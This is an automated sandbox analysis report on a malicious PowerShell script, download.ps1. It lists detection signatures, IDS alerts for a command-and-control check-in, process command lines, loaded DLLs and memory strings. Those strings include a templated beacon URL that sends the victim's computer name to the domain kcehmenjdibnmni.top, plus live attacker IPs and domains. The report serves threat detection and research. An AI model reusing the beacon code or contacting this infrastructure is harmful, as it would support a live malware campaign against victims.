
Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1584337
MD5: 99e9af1d265f8b0fc8e512e80f07d739
SHA1: 7433e52e040e3d3c71e5514064b49bbbb25ea7c7
SHA256: aa7a1ee6564e0c793d61c6ab01555d316ca42bc71b7cf6c33a7cc66d5ccf48be
Tags: KongTuke ps1 user-monitorsg

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7356, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7356, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T08:44:07.183699+0100 | 2057741 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T08:44:05.964108+0100 | 2859488 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 61736 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T08:44:07.183699+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | TCP
2025-01-05T08:44:07.821517+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 142.250.185.164 | 80 | TCP


AV Detection

Source: download.ps1 | Virustotal: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 90.4% probability
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbF source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B109000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbps1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1798952484.0000022F3B141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1798862238.0000022F3B130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1795254706.0000022F3A8D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbOWD1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb9-00C04FB68820}\InprocServer32H source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1796663905.0000022F3AF5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1797817107.0000022F3B066000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Network traffic | Suricata IDS: 2859488 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.4:61736 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49730 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 45.61.136.138
Source: Joe Sandbox View | ASN Name: AS40676US
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 142.250.185.164:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 45.61.136.138:80
Source: global traffic | HTTP traffic detected: GET /trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: kcehmenjdibnmni.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_ equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQ8IcBCAYP equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: kcehmenjdibnmni.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php?id=$env:computername&key=$kiewrcbop&s=527
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23C6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23C6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B896F46
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B897CF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B896A49
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B890FF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAF3D6D
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engineClassification label: mal76.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uyuariw.c0n.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: download.ps1Virustotal: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbF source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B109000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbps1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1798952484.0000022F3B141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1798862238.0000022F3B130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1795254706.0000022F3A8D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbOWD1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb9-00C04FB68820}\InprocServer32H source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1796663905.0000022F3AF5D000.00000004.00000020.00020000.00000000.sdmp
